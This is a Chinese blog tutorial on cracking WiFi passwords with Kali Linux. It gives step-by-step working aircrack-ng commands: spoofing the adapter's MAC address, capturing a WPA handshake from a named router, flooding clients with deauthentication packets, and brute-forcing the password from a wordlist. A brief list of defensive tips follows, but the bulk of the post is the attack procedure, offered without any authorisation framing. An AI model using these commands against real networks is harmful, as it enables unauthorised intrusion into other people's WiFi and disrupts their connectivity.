欢迎光临
我们一直在努力

kali之破解无线密码

无线加密方式:
1、WEP(有限等效加密)–采用WEP64位或者128位是数据加密  目前比较差
2、WPA-PSK{TKIP}–采用预共享的WIFI保护访问,采用WPA-PSK标准加密技术,加密类型TKIP
3、WPA2-PSK[AES]–采用预共享密钥的WIFI保护访问(版本2),采用WPA2-PSK标准加密技术,加密类型为AES
4、WPA-PSK[TKIP]+WPA-PSK【AES】–允许客户端使用WPA-PSK[TKIP]或者WPA2-PSK[AES]
5、WAPI-即无线局域网鉴别与保护基础结构,中国支持的加密技术,是中国无线局域网强制性标准中的安全机制
全球无线局域网就两个美国的IE802.11 中国的WAPI,目前主流WPA2-PSK

第一步:桥接无线网卡

第二步:查看网卡信息

第三步:启动修改网卡混杂模式

root@localhost:~# airmon-ng stop wlan0 关闭无线网卡

root@localhost:~# macchanger –mac 00:11:22:33:44:55 wlan0 修改无线网卡MAC地址

root@kali:~# airmon-ng start wlan0 开启无线网卡

第四步:搜索无线信号   Ctrl+c 停止搜索

root@localhost:~#airodump-ng mon0 扫描无线信号

第五步:抓取握手信息

root@localhost:~#airodump-ng -c 8 -w maguangjie –bssid  C8:3A:35:58:12:C8  mon0

-c 是信道  -w是保存数据包名称及路径  本次默认保存在/root bssid无线路由器mac地址

第六步:泛洪***无线

root@localhost:~#aireplay-ng -0 100 -a C8:3A:35:58:12:C8 -c 00:0f:10:00:a6:61 mon0

root@localhost:~# aireplay-ng –deaut 100000 -a  E8:65:D4:5B:2F:30  -c 60:36:DD:A6:18:D2  mon0 –ignore-negative-one

第七步:握手信息(handshake 0 表示没抓到包)

第八步:上传密码字典

第九步:暴力破解

root@localhost:~# aircrack-ng -w /root/mi maguangjie-*.ca # -w  指定字典/root/mi的路径

第十步:得出密码

防御 WIFI破解的方法
1、.禁止SSID广播,隐藏无线路由器名称
2、绑定MAC地址
3、设置WPA2-PSK密码连接,尽量将密码设置复杂,延长***者破解密码的时间
4、移动设备不要“越狱”或ROOT,不要连接来路不明的无线网络

赞(0)
【声明】:本博客不参与任何交易,也非中介,仅记录个人感兴趣的主机测评结果和优惠活动,内容均不作直接、间接、法定、约定的保证。访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。